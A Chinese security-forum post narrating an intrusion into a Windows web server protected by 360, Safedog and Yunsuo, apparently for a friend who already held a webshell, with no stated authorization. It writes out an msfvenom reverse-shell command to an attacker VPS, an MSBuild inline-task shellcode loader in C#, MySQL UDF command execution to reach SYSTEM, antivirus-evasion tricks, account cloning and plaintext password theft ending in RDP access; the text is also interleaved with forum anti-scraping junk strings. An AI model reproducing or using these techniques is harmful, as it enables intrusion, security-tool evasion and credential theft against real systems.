中国网络渗透测试联盟

标题: 白名单msbuild绕过360套装安全狗云锁提权 [打印本页]

作者: admin    时间: 2022-3-31 02:01
标题: 白名单msbuild绕过360套装安全狗云锁提权

0 R" `, z9 e* ~. f& ] Y 0x00 前言 ' y; `* U6 G7 k" n

3 z) A# b" ~/ f% @. a* n

h) [; K5 W9 b1 X- c1 @ 平常自己挺喜欢折腾的,有时候遇到一个好的突破点会折腾它个几天几夜,刚刚忙完护网,正准备修整几天,突然有人朋友联系我说有个任务需要搞进去,问我能行不能行,后来得知是已经拿到webshell了,通过一番努力便有了下文。 1 _$ u/ d: F3 G2 H- C8 t

' ]$ M5 p5 m9 d5 P3 v' q) U, y5 p

, V& u: B3 M* ~1 I9 ] 0x01 前期的信息刺探** " e- t- g$ E: j% ?( [" i+ d

. G/ D0 G' ]9 u8 B. O2 y, i! f; l+ f

5 _6 U" }! M; {7 Y# W7 C0 g 首先拿到webshell,发现phpshell只能访问shell所在目录,连网站根目录都跨不过去如图: 7 v6 {& p% Z% c' k$ x

/ w9 T$ j9 T1 N4 u- u/ c+ u& m5 n" |

4 N) Q: s; B* ]* f4 J6 N. U; T4 g6 n( w
% J+ K& ~- }+ B; g) M c
d盘根目录就更别提跨过去了,随之执行一下命令看看,如图: 4 o$ `; b1 ?5 _, L- x

4 L' h& q- y2 L( ~/ k; c# y; B5 s

; X) z; h" W' f6 b) t( C + A- k* ]" L% K& x

6 _$ F# v+ E: w8 h# U$ C

$ ]: C6 Z- V2 X W$ X. T( t whoami等简单的命令可以跑起来,tasklist发现了 某某安全套装等安全防护进程进程,om my god,刺激,就喜欢这种各种需要绕的环境,既然能跑起命令来那就上免杀的exp来试着提一下(通过rar解压方法突破某防护程序上传),如图: ; k8 J& H% n& k; u- P+ `

! ~( V" [7 G4 t+ _3 P# K" J

- h% w1 A9 H8 a# j$ }! A2 X" J0 Y7 r
: I. t1 B; [) d
经过测试发现,不管把exp放哪个目录都提示拒绝访问,特别是net命令都禁止执行,越发让我感觉是安装安全防护程序的缘故; ! q( L* @9 P9 X- l3 a8 U [

4 J7 N8 j& | u2 O( N% H+ \8 t

# z/ j: e% n F7 i/ F( _) b6 f 0x02 深入 w. D/ O& d5 Y; x

, I. g7 T% C3 j/ j3 V

5 d% a1 k( z' n E% d: t 通过msbuild.exe白名单方式运行metasploit payload绕过某安全程序调出w3wp.exe进程
3 b' [! `# Q; o7 ?* ~) r8 v0 o2 N/ l
webshell执行直接执行rar程序一直提示拒绝访问如图: , Y F7 `- g2 U% k

- W" v" a% l7 ^! Z

; i z8 N8 ^3 o
" _: t1 t& h/ @1 O: U- P: a
在实际做测试的时候发现windows下用shell反弹个cmdshell回来执行一些命令要比在webshell好许多,看官请看 6 M, s% ^4 ?0 e% d8 a

- b8 @: z* `) y i8 d

/ A- F' B7 W. h+ s* n) \1 c
, \( c& s) K& N3 [
成功将我们想要的exe程序解压到指定目录,webshell下是没法cdrar目录的,现在能正常上传exe,我们看能不能想办法让咱们的msf不要闲下来,之前考虑用 php/meterpreter/reverse_tcp这个payload上线弹回meterpreter,但是弹回来什么权限也没,连ps进程命令都没法显示,这时候就想到了使用msbuild.exe白名单方式运行metasploit payload绕过某防护程序让msf上线,于是就开始动手,具体如下:
( h: W0 H) H# a8 |! a" b5 c
首先使用msf生成一个c#payload . K/ F3 a6 S4 b* \ X. a& h" V

2 g6 Z% k5 ^' i2 r( R

4 N3 e. D* V. C6 }$ i {5 @ msfvenom -p windows/meterpreter/reverse_tcp lhost=vpsip lport=443 -f csharp
% t5 c! j& N) P4 J: u$ x
代码如下: # m+ J- E9 s6 N, l

4 u5 ~" H% N [# t

: }) \ Y+ l C8 ` p byte[] buf = new byte[179779] { ! A8 S+ B" v% u6 n' h; ^- N7 n

' G4 S- p2 r i

; M. z# f/ Q: F3 j/ |   4 G( r; y8 w8 X m2 b" b; E

0 C D: ?0 W3 ^3 T" y+ z% }

% A6 t/ i8 q8 l) V( T+ X+ d! g0 I   2 R% D& D$ S" a

1 h7 o) k5 [/ A$ i5 a

- s% O1 c- Z, [" l) ?; i. Y 0x8b,0x71,0x1c,0x85,0xf6,0x74,0x58,0x33,0xff,0x39,0x79,0x20,0x74,0x51,0x39, 5 V, n5 t5 D$ q

* m+ Y# a! \4 ^

3 F( d5 w0 D" r d: N 0x79,0x24,0x74,0x4c,0x89,0x79,0x14,0x89,0x79,0x08,0x89,0x79,0x18,0xc7,0x41, 5 t3 J# a( A6 z- p- F

9 h7 f; T0 _6 e3 h2 c

( K2 w. h( o7 J/ b+ @( J+ G 0x2c,0x02,0x00,0x00,0x00,0x8b,0x46,0x08,0x89,0x7e,0x14,0x89,0x46,0x10,0x39, ) k( Z& T- d4 q0 r7 h9 e

# L; [1 }+ z# k( [

' c; S1 N% v( ^9 R. S% L9 w- O 0x7e,0x18,0x7d,0x03,0x89,0x7e,0x18,0x39,0x7e,0x18,0x6a,0x2a,0x58,0x6a,0x71, ; A0 Z& |( _9 s; }6 }5 v4 p& V6 V* m% M

# S3 }. D9 q% W# z, b% l

" g% P! T1 \ h) H 0x5a,0x0f,0x45,0xc2,0x89,0x46,0x04,0xc7,0x41,0x30,0x01,0x00,0x00,0x00,0x56, & {' a* H( e F

. O. s3 ?$ X: q% T0 }1 |( k( V% u

$ j( o; B- |8 Z' {" D7 s' E 0x89,0x7e,0x20,0xe8,0x88,0x07,0x00,0x00,0x56,0xe8,0x8a,0x15,0x00,0x00,0x59, , k' L6 C, T7 N2 h* }

+ f1 G# U( y0 p9 T6 ~/ Y

" r% q( J6 U$ i/ D 0x59,0x33,0xc0,0xeb,0x03,0x6a,0xfe,0x58,0x5f,0x5e,0x5d,0xc3,0x55,0x8b,0xec, * \4 {6 ^5 P. T3 e

$ i- v& }& }4 U/ {( u9 F, ^2 a% q

$ o! ^4 D/ l0 X5 q 0x8b,0x4d,0x08,0x33,0xd2,0x56,0x57,0x85,0xc9,0x0f,0x84,0x8d,0x00,0x00,0x00, 3 E# ]7 ~$ k; `7 K* d) `& q; X' X

4 c+ d6 h. M6 z4 X/ y

, |. r( i( E9 I2 N! E- \ 0x8b,0x71,0x1c,0x85,0xf6,0x0f,0x84,0x82,0x00,0x00,0x00,0x8b,0x7d,0x0c,0x83, 0 }$ G! v K ?% x- S3 Z' W

+ _; V4 A! z0 Z# U

, J7 a2 H9 w0 ~' F; V) ~ 0xff,0xff,0x6a,0x06,0x58,0x0f,0x44,0xf8,0x83,0xff,0x09,0x77,0x71,0x83,0x7d, 6 s# t8 L7 Y+ C. J% n! q

/ j! B, J, d8 b2 S L$ V8 w: K& F

' D) j" X- S4 s9 V5 O* ~ 0x10,0x02,0x77,0x6b,0x6b,0x46,0x7c,0x0c,0x53,0x6b,0xdf,0x0c,0x8b,0x80,0x00, . h) }# ^: C4 b3 [+ @

) j& J8 ~/ x, B! g8 r2 z: s- k

8 K3 j9 R# w, A 0x9d,0x02,0x10,0x3b,0x83,0x00,0x9d,0x02,0x10,0x74,0x11,0x39,0x51,0x08,0x74, ( H+ z) [2 Z$ D) n

$ X5 X4 G( P3 W# M* L1 O |

) e2 g0 r4 j* O* P, Q4 V* X 0x0c,0x6a,0x01,0x51,0xe8,0x2b,0xf6,0xff,0xff,0x59,0x59,0x8b,0xd0,0x39,0x7e, E3 k* E! `7 d3 H0 g6 I; a

. S8 v* ?0 {3 G' L2 {" F1 \4 G

+ P; p; ]# G: r8 m6 B  0x7c,0x74,0x31。。。代码太长省略。。。 # R# i% ~; C1 T# D# G% d

* Z2 \( }. x7 l7 d4 k

& b$ K* ]: P9 R  }; ' `9 s6 p' ?# N" q

2 Z4 G+ ]2 Y Z$ e- d9 E1 H

. D H8 D7 i( t ?   1 b: Q- ^6 U, {' U: ~" Z

* Z( @) n7 e& S/ C$ v

# U3 c, r- l+ F3 O               UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 6 W4 }9 x7 _8 E `! U

5 a2 }" {) G. y, N# P" b* u/ D

& ~" {8 [8 n/ g' X3 Y                 MEM_COMMIT, PAGE_EXECUTE_READWRITE); 4 a, x4 A0 ^$ G3 U# S s2 b

* s( b8 x- |5 a; \! h! s9 m

0 g8 p) g I3 `. t               Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); & ~/ Y2 k: E5 T

/ r! E5 T& a% E# F- T

) X' E0 J: p+ u: ]              IntPtr hThread = IntPtr.Zero; 8 q1 X8 z- E& g

& S' v7 z$ Y+ V: {; ^! Y

" m- U, ?9 `8 M              UInt32 threadId = 0; * Y4 |6 Y* c7 t7 V( c

0 d2 |6 R+ s2 {' ?7 U& K5 Z! B4 B

) c5 y F7 A3 |+ F0 o9 l2 H               IntPtr pinfo = IntPtr.Zero; 6 g( |5 @2 e1 D, V$ J

3 v9 T0 J$ t! K8 I

0 t, V$ U0 E8 s$ O               hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); . C2 C5 g7 e& S4 D5 E0 u4 V

) H2 m" B& T" [" z/ i& S5 @+ j

+ I- d/ x( Z* u. J4 \2 s) K              WaitForSingleObject(hThread, 0xFFFFFFFF); . n; B- |( f; W. {- K" A' U! ^

; p' b0 o0 O4 j2 W. }0 f9 s

' Z2 h- F/ F6 e \% d! L) c% C             return true; ! }( x: w ~, |3 X7 U+ X4 q1 a& I* s

O4 V' i9 B% M6 o5 y

9 h: F( ?' t! `           } " J1 p* N3 |& `0 }. G1 V/ z7 C% J

) x5 q. J$ r/ u9 n! G# |

P( v1 _# _: r/ M) Q& j$ x         }     0 A* P2 N' F0 P! o [

0 f; Z8 ]7 L9 ~+ Z! U: T5 G* T6 |

8 ~4 U$ L" z% r1 K        ]]> + m3 y7 K* `8 x; Q& f

0 W( I3 }' ~4 p$ n* [

# n% g8 z8 b5 K" d- c/ n        </Code> 0 x5 D. J: Y- {; ?5 L \1 |

1 Q3 Q/ y) `4 V% |" I9 L# a0 V. G3 f

. \ b. S1 f X     </Task> $ b0 t0 ^8 c6 `: F2 }

s) ^4 x5 {6 s- {* d! e2 T

) A$ ?% Q& b! T K7 V    </UsingTask> $ h& I, ] f( O8 V4 Z n* c0 W

6 M. T7 V2 ]9 [8 R

; {9 T0 i' w& X2 F, p  </Project> 9 Y0 g0 N7 L5 R

3 V$ k" c. M. w* c/ ~& i5 a7 Q

: ]0 Z3 L* H A# b0 ~, m: g msf生产的代码替换原始代码的内容,这是原始payload如下: # K4 v' `" ^) g* r1 I

6 d9 C! Q% Q! ^- R M9 X8 v

2 J5 A# b( B/ c1 m" i2 A <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> 0 ^8 L+ W, }+ U5 M u) V

( K, t# I1 W; ^

* H: X+ J# T" h   <!-- This inline task executes shellcode. --> : D$ j: Y h+ B7 m, g+ m. J! j

1 ?- d; ^/ Z. S% m

' E: Y8 h$ k% \' K# i6 t: [! |   <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --> 3 C# v: x' A5 p3 G6 |! x& t

* b/ g2 ]/ h7 R5 Q9 u

P' f+ M+ N; J) ^+ \4 N6 Q   <!-- Save This File And Execute The Above Command --> 9 E9 x6 k- @5 @8 j

( s/ k: Q0 h& N( k2 @, `7 K

: k" P# Q. K6 @' z1 w   <!-- Author: Casey Smith, Twitter: @subTee --> $ {4 w: m3 ?6 `

0 M* v/ p8 c+ h7 |! Y( n/ X

% {# E+ M9 K- ^: R9 K   <!-- License: BSD 3-Clause --> & F% B; R0 Z$ x. @

5 |7 a4 X( Y5 X8 d! ^

( n/ j$ m: k" ?   <Target Name="Hello"> 8 G) F( w; w( \2 x1 i

. U/ ?2 x: S |! Q& [1 Z

! ?1 ~2 L5 h! h" n$ }     <ClassExample /> 4 |; J( p- \( l4 w( @- Z' U( X" T

/ Q9 @1 W! f& x; L8 p

" }6 m4 a/ a. d) \0 o' e4 T1 `   </Target> . r! n0 i7 m" g- d+ A- R( B

3 d6 m" O) G7 ?5 W* I/ m" H3 Z! @

9 p: h/ h& g1 s+ o- k   <UsingTask ( n, ^! |) U X" b. q) E8 {# a

6 g8 n( x8 q3 y2 e7 i. {

+ L2 J9 P: m2 x. x     TaskName="ClassExample" / u* W9 x( V8 ?7 G0 d0 U

! `9 M& u( `7 j

! M' T& E5 R/ p/ g     TaskFactory="CodeTaskFactory" 2 @. \1 w) a% x

" j- m% W% \6 m$ a0 W7 q) S

0 u3 h1 C+ y: d* O# q     AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > - p) }& X9 t) g" m

$ z1 e, a' z" b- j- }( v

$ O2 s* Q% O' Q* j     <Task> 3 c Q: s& s5 f& b+ F( M$ E

9 t h* T# m1 w

$ W, f/ n2 ~9 F! M4 v   # g# L( G. u3 ?" ]& ~# B4 o

7 b- _" w6 I& A' }2 \6 R

6 j* z# u9 m) E( [7 D: c" P t       <Code Type="Class" Language="cs"> 3 q+ {+ A+ I: l& t! d/ y1 s, u4 r) U! e

x1 ^9 x/ C: q" T

& G5 F9 l2 z+ V: t ~ Z       <![CDATA[ # s/ E7 F$ @3 E/ x9 ?

* O( x4 Q& U. ?

& z) x8 q3 o; ]# a         using System; # J/ m% _5 f- F, n

], t/ A. _( I9 g

; L; P" j6 @9 l3 f5 x i! d         using System.Runtime.InteropServices; / j; `$ O4 B. i0 o9 i8 q

0 Q" B9 [ Z& g# Y

" ^% @" ?; y7 a         using Microsoft.Build.Framework; 0 U8 \6 d# `6 g! ^5 g5 D

: ^" ]; _1 P' \( F

) b% D* w3 t$ y/ t$ H+ @         using Microsoft.Build.Utilities; 8 A2 H; W! q" z! v( i, f

6 P G9 A8 e( n) c% c8 M

. T# A! P7 f& v% o         public class ClassExample :  Task, ITask ; c1 N7 U/ y9 s

# D0 a. Z/ F8 a7 r

: ~: b5 y; L1 b9 ?         {         # G5 s3 G/ j; g3 _+ e7 L3 o

# P- X) U0 z" B4 S( m

; E: X- S1 M( n- q7 ]# K* ^           private static UInt32 MEM_COMMIT = 0x1000;          ) U! I1 @9 }4 v2 G+ t) l

* z* r6 i8 f8 ], ~4 J

% A, e6 Z8 n* v8 v( q }# E           private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          ) v( A: m& p& x* v/ T+ Z" |# ?

u3 d5 Y. v" F W5 i1 u

& Z( N2 K& L/ i7 q& X0 k& x           [DllImport("kernel32")] / n1 {7 o, h2 ~

/ ~. @; `) o$ W- e

+ {2 ?0 B: Q0 s- I4 n5 ?             private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, $ ^- V( F7 i+ p/ B; B8 p

" n: l6 C5 q6 W

; w& {1 s3 |3 x7 W2 ^" P) n4 M             UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          1 J# V7 {# L5 c: C' I4 O2 S6 P

# P' _$ I2 f. q0 z: F5 p- z

# A1 F3 F. [! m/ A Q; _, H           [DllImport("kernel32")] 1 T \: B. Z, P5 b2 V6 i

/ Y. j3 b7 {9 ?

/ w1 e1 q X* E1 z2 f             private static extern IntPtr CreateThread(            3 _ q/ w V2 l; R* j( _* m; ?& [

8 p( w9 t5 j k; j. \

+ h' [! E* y1 C             UInt32 lpThreadAttributes, ( w0 w1 p# q+ |% H: [" M3 q

9 g3 |2 G$ U6 b

; E+ f; ]. l D5 H             UInt32 dwStackSize, 5 F6 C3 d) X2 Z, ? @

1 m1 I& a, v, p8 X; U& m6 }, {

i) E& y# z8 `' c! v j1 g             UInt32 lpStartAddress, 1 P+ p/ n+ B# G4 B: T8 n- G

; Q Y( S2 x- ?: w

* {! E, \) w& Y1 s+ o" ~6 p             IntPtr param, . x2 N, u' W, O- h: X2 k* a

$ k, }- k- r% b( j m$ @. U; ?

9 b+ O8 z, B+ U) F/ U. o             UInt32 dwCreationFlags, % x: D1 k6 O u' a: f" q. V

' x2 C. t- j# v2 I/ o2 ]) U

4 B0 @8 [9 v. ]- H4 q             ref UInt32 lpThreadId           , o* k- r: R. K+ @

( J: `1 c9 s0 L6 q5 V# K" T- W

1 v& @* n8 Z6 ~             ); 6 |+ v* w% ?5 ? J7 {9 @% B7 c+ y- F

5 X& Q- q& \. |+ K0 q0 E

, X# K* R5 T+ e0 P           [DllImport("kernel32")] ) k/ x# s; w0 }0 S

- d1 [1 T, n2 y7 A

% G( \- Y% P, @5 y7 \             private static extern UInt32 WaitForSingleObject(           % u4 X# s- A, c3 ?6 m

* ]% K* a: s% w8 n9 _# L3 w+ x

6 p A' o* N# N5 e! q% _) h* |" R             IntPtr hHandle, ) b; L7 c* B4 H+ n8 |

7 {: N. s4 [* q! ~: L8 A9 S

* @1 m# ]2 z, e- i             UInt32 dwMilliseconds % ]( D E& j$ @; A4 r: W* e: K

) ~3 }) R; O) r. i* r

! d' s5 N ?' a1 [             );          ' q5 z. l( C3 P! m3 U

8 A& Q3 f) W% M5 S& o s6 W

% `2 G' l" X1 Q$ N           public override bool Execute() ! G' t) J# \, Z( f+ M

, t* m' o7 c$ ?4 J4 p2 `1 \7 d

+ p) G, p6 w2 R5 r$ y4 K           { 0 b4 |# h& F% ^; g( x8 J4 v7 H

5 i: }; u. v' C, N3 m

) v$ ?, T: b3 L; C4 R/ j9 I             byte[] shellcode = new byte[179779] { * R5 z" n0 M2 E/ `# U- v- M1 A5 }, z

# `0 D7 x' e3 W% j4 S3 X

( l) A' }0 I1 ^             这里是msf生成的c# shellcode,代码太长省略  D) v& H+ L( [" i% n

+ E" C- b; H1 [: ^3 x- s# }! G

* [. w, y; }# t& z$ ^. H# d# g             }; 0 u) g [2 p% }* D; H- X8 _

1 B* d$ J0 P+ b

9 u- v- O# t8 i- p             UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, $ J, I. L# W4 [# S, I; d

% \# S _3 |, v0 l8 W; \, X9 K1 ~

9 d8 C# {* b V& c( v+ i7 N8 l: V                 MEM_COMMIT, PAGE_EXECUTE_READWRITE); & W) J0 K; Y/ z5 |- e0 Q& R( Y0 x

* }( L! `8 U/ z- t+ N7 @

5 Y9 t3 c4 [8 x X2 q               Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); ! o: a' h) U1 T5 Q/ |

2 K- I8 c+ ]! b! T' ^( Q* D

J/ m" k/ T" H6 D2 k, S6 A5 ]               IntPtr hThread = IntPtr.Zero; , l6 {+ p9 o3 L, I! d" K

. M6 M9 \) Y1 A! b y7 |4 ?2 q

2 D! r2 ?: c! ^; e* u8 j               UInt32 threadId = 0; / h B) c. z; e$ w6 o/ _# w

# w O( u3 p& }! l7 L

6 j- O6 N6 ^* z0 a+ ~               IntPtr pinfo = IntPtr.Zero; ( c0 G& x0 l: p) A

6 _6 T+ q6 x( Y, }6 u

- i) X# W# ^' G, \( v. b               hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); ) J2 [2 B, J7 c8 A

7 ^' u: h" |( ^8 g2 Q( g

# G* K6 S8 x: K               WaitForSingleObject(hThread, 0xFFFFFFFF); 4 C4 ]- q, { M$ F+ O3 }" L, x1 R3 I

* ?9 ?% L: p. C5 t8 P. G6 r

$ r+ T4 |' F9 n, I               return true; 2 r9 \* n2 O8 W% x

8 o# b I1 w) N$ Q+ b$ [( D w

& p8 @& l5 R- Z4 C8 _( Q           } & i$ M6 s& k, w; h9 g% Z5 e

, }- P" E& t g7 R0 P- O" s+ W

; l& @4 e$ y. c; R3 h         }     6 U$ t! V" R. s. Q8 o7 j7 L, M

" K) X8 U; a4 D4 ^, H! [

1 M( w2 J5 h3 y- u% b0 f       ]]> * R' \# ?3 F, C7 b2 S

3 e5 ^& c4 W3 |; E

# G1 k/ R& ?) @$ n. l       </Code> , J2 o. K4 i* |6 Y8 j8 c

. [0 z0 I2 X8 p% _! ~9 i6 Z# ~

, @- f6 a% w. \2 v, w* @$ I5 w- L     </Task> 3 T( Y( s7 w C0 @) k# l

3 o% a- F, v) _6 j( g

& T% Q1 H$ P$ W1 [% J% _8 n% B   </UsingTask> 9 ]4 D) k* v2 L7 o! m& x7 i

3 a4 ~9 O/ c6 b: M. ~& j6 c$ w, v

) M D5 b" f7 ~; f- \! ?8 Y9 n% i </Project> 9 M$ W$ o6 O9 t8 H

6 q$ e- }+ h- b2 W( O

3 N. T2 Y8 P8 ` 需要注意的是必须改成shellcode如图:
% F. ]& q* v0 T& M8 n

/ v9 a$ z. i; l% v
然后上传到web目录,nc反弹继续执行如下命令: " _$ w4 p/ F# ^4 y1 M+ X

% W+ G* ?7 G e7 G2 R' B; I

2 d; D6 V% n# Q7 `+ G, S cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\ # P% I: \4 b4 Q6 I* z) T" o

V( [6 d5 ~5 ^/ M5 _

) {1 ]1 Z5 c# S3 z* C msbuild.exe D:\1\1111.com\uploadfile\19200\443.csproj 0 d2 P, R2 D9 y" T# A4 Y* A7 D

5 \6 r. M' E3 b" `# h% X

' L _8 e1 Z7 g# V 这时候监听好的msf就会返回一个meterpreter如图:
q( s8 B* Q! n7 `

1 ]& E' c( j( w/ \: x
试着在shellmeterpreter下执行exp都提示拒绝访问,如图:
2 v" B" `+ G. N% A

1 F4 X& G' a' J' W' f
但是测试upload上传命令确实是成功调出w3wp.exe 进程,经过一番努力无果,只好换思路解决。 " }& P6 ~" x: t) D8 W) `# }

' C" O$ l: ^6 X* d4 m3 F9 B* C

+ W# H& e) o0 z t9 |5 F, ^ 0x03 MySQL udf提权 3 `- ~1 X9 q( V$ l6 Y

, k( {3 F1 {2 ]! m: p; {' ?

! j( L# w4 p/ c/ h9 w 通过上面的一些测试,已经无望了,这时候就想着用其他办法,经过测试发现网站支持asp,就上传了一个aspshell,各种翻目录各种测试,终于在网站的二级目录数据库配置文件发现了mysql root密码,OK,上传udf提权php马,在具体测试过程中发现,市面上的udf Php工具都被某安全程序被杀了,我发现把被杀的php后缀修改为csproj上传不杀了,要不然无论把被杀的php换成什么后缀名都不行,然后再通过PHP包含这个文件,就可以突破了(也不知道算不算是个某防护程序的一个bug,总之用这种办法让udf工具跑起来了),如图: 8 s$ S+ J% Z0 T8 Z% _( i$ t0 ~* l! R

8 B" ?" ?% r J" v. Z

+ `% K& ?6 u$ \' Y
6 W% s+ Y; k5 J+ f7 I+ \ O/ ?2 o
然后按常规导入dll,提示dll导入成功,创建sys_eval 函数执行命令,却又提示函数不存在如:FUNCTION mysql.sys_eval does not exist,在测试过程没少折腾,用portfwd命令转发目标3306到本地,利用sqlmap -d 上传dll提示不成功,后来用--file-write命令上传dllsystem32下也失败了,但是发现上传非二进制的文件的话是成功的,后来通过查看权限证明不是权限问题如图:
/ X5 A3 F; O7 D1 } select * from mysql.user where user = substring_index(user(), '@', 1) ;
0 D& s, ~' U1 o$ O7 F

! U1 p9 g9 z+ e! X8 N

/ J( M$ l4 q0 L; ^* h( l3 p2 P6 |: ?
7 J" L3 L4 i% M @8 v/ q
权限都很OK,很悲催dll被禁止上传,可恶的安全防护呀,通过查询发现几个自定义函数,如图: 5 Y8 }( |: ~& q) S* Z- u

/ s$ m& |; a) J9 Q) C Q9 {& p5 U

0 \$ T6 w) t1 d3 B: [' R5 l- a
# d" R; c* B0 M- o- M- h1 V
发现udf.dll已经被占坑了,我们查询一下看看
" Q1 ~( F2 Z8 O, x$ nselect hex(load_file('c:/windows/system32/udf.dll'));
如图: ! e0 |; n2 r+ d! M; B

4 Z( Y+ ?$ \# |& @2 M

+ p& L% U' z3 w
1 n( V K. o+ \" L/ W0 L
我们利用php环境把它转成dll,代码如下: 6 c: G; c, `0 ~8 P

$ d: X7 S4 N- o* Z$ i# O5 n

1 E- ~% O* |( s. k. v <?php : E- d* @1 F* P) b# ~- J

; [ I2 Y" ?! @- D8 o8 j3 J

: i5 W, y9 c0 _ echo file_put_contents('udf.dll',hex2bin("这里为sql查询出来的值")); & o5 x K/ \$ Q7 L( V

0 y% A; j7 N3 s9 b, |+ [

# n* \) Q( n5 m6 h9 W ?> * _7 ~. P }% N p

3 G4 @) _2 J- q7 w" u; b2 d+ n

" I v& f' N; F: ^ 成功把它还原成dll文件,用c32am打开看一下他的用法如图: - m k* \+ A) w6 [. b

1 C, N1 S d7 @. \/ U" w

+ @& Y: C. y. M4 v
8 @& P3 A6 H2 D2 C% c
看看这个shell函数的用法, 9 |1 ]6 f4 ]% b3 o a7 B$ O/ y% m

7 u; i& n$ \; d# m: a! O9 p

% m$ w$ p- D5 y# z
: @/ @6 P, j( L' A+ l1 K2 j
正好和dll里面的信息一致,但是在测试的过程中发现cmd那个参数用法没法执行命令会卡死,后来试了execselect shell('exec','whoami');,如图: / t R6 o! q# c y, W: F

0 s3 H* w' r0 ?- u/ b6 R

: u& q y1 ^/ T- Q o f
! U) J, B& i$ X% {- h
说明这个exec可以绕过安全防护执行命令,接下来的测试中打算使用msf来操作,于是给目录上传了个免杀的msf工具,过全世界所有的杀毒用法 msf vpsip 443,但是监听好的msf一直没返回来meterpreter,后来没办法又用白名单执行命令成功上线(奇怪的还在后面)命令如下:select shell('exec','C:/Windows/Microsoft.NET/Framework/v4.0.30319/msbuild.exe D://1//xxoo.com//uploadfile//19200//443.csproj');注意斜杠问题否则执行出错 7 o+ I$ u9 @- M# V2 T

' k7 @, [ w5 J- H

4 W$ \+ }( v& Z' a
2 O# O, X1 S$ `$ w6 n$ p, P" S5 o
但是奇怪的是已经成了system权限却没办法shell,这也正是这个目标奇葩的地方,执行shell卡死,后来ps了一下进程发现administrator的进程migrate pid,然后再执行shell成功执行,并且也可以执行net user 等命令如图: 9 d" M* F& b, Y

8 i3 Z* ^) B% }* \- I, `& M4 @

" B' {# o, l! U7 `/ t" } " L* T A1 ]/ X9 s, t

) S- Y+ a% j9 Z/ `: T/ ~0 W! o

8 N7 D: ^3 ?3 D( N/ h, t OK,直接net user添加账号肯定不行,利用userclone克隆添加账号密码,账号添加成功,但是加入到管理员组失败,手里有杀某防护程序的神器,但是似乎用不上,杀完需要重启动静太大,OK,这时候发现administrator在线直接上传getpassword64免杀版抓明文密码,得到administrator的明文密码,试着用msf模块抓一下密码,如下:
3 H+ n# v* A1 t. \( d$ O

/ V8 ~6 g& |+ Q7 u, ]+ B
没有成功,因为之前也踩点发现3389没有被某防护程序加入主机名或者ip认证,可以正常登录,所以也不涉及绕过认证登录的问题。登录如图: ! c* e9 [+ E/ V7 D5 u

- u+ P" `# O) m4 k/ S, C) w! @

9 Y5 B1 N; }5 ]; @ & o4 O0 d' L# u3 ~* F/ B* }$ X

% \( `# G5 ^6 Q: B% U0 y' ]: y1 S

% T0 I4 w- r; x1 n Q 渗透到此就结束了。 $ c |4 U5 w; f0 L. K- X4 g

6 h4 C6 Y$ k9 H9 n# f

% I8 g+ g' j0 P7 V" L' f& y" { 0x04另一个案例绕做组策略限制执行命令 " ^: E( F! J+ Q4 q# J& f

3 @* p& `( r4 ?- `3 Z+ w8 W" p* u" c

, |* Z, t3 O9 a0 ?0 n 主要还是白名单绕过执行程序及配合udf提权,碰到前人留下的udf后门直接提到system,剩下就是一顿乱折腾,不过也不白折腾,摸着石头过河没什么不好;第一次在先知改版后写文章,文章排版之类的还是不太熟悉,可能写的不尽人意,还是请多包涵。。。。。这里要感谢先知V师傅,莫须有等好兄弟的大力支持,一晚上陪我熬夜。。。 6 W! ], V ~5 U0 i9 M. K% r+ h

/ z0 G% i) e# }8 n

/ F/ f7 p( f1 @6 X. _& g! { & X: v; q3 V7 C0 X* W5 @! v6 e x

( P8 W Y& E7 {5 d9 F

% j( T6 K! z {: e3 D0 o 9 o; d& C1 s4 P. E& g3 P

; V* ]& P8 q" Z* u6 q: U

- c3 Y& N5 A3 C9 x1 z# }! E 命令跑起来了,最起码遇到不能执行命令的时候用白名单执行可以继续开展下一步工作,或者利用msfload powershell也行继续搞,哈哈 & m6 _2 H# }9 A6 Z# \. L( V

5 B& I1 h! M& ~! t

2 t: Y2 G/ f$ N8 i" ~ 0x05 总结 : {9 K* t9 q& T

8 H0 a+ P8 Z2 G% e

3 z) d- m# P K: C [: @: _( w) H, Q   3 Q+ G! B2 F- F) P h1 ?9 p: F

. H2 x, |3 ]2 x/ v# j" c

; _/ T% F( i- Q+ W 黑客是一种精神,虽然我不是黑客,但是我崇拜这种精神,什么精神?就是永不言败,勇于突破,敢于挑战,崇尚自由的这种精神或者神经,值得各行各业的人学习。(自从学了黑客,人也变得踏实了,也不虚上跳下,也不让家里人觉得这个人不成熟、不靠谱,总之学黑客,得永生,黑客大法好!!!加油兄弟们!) 7 E, {. b1 p/ K' F( |& ]9 v

$ I3 ?- J3 ?6 W

/ f Z) I0 P; l8 h7 N   ! ~6 H) x0 e) `






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2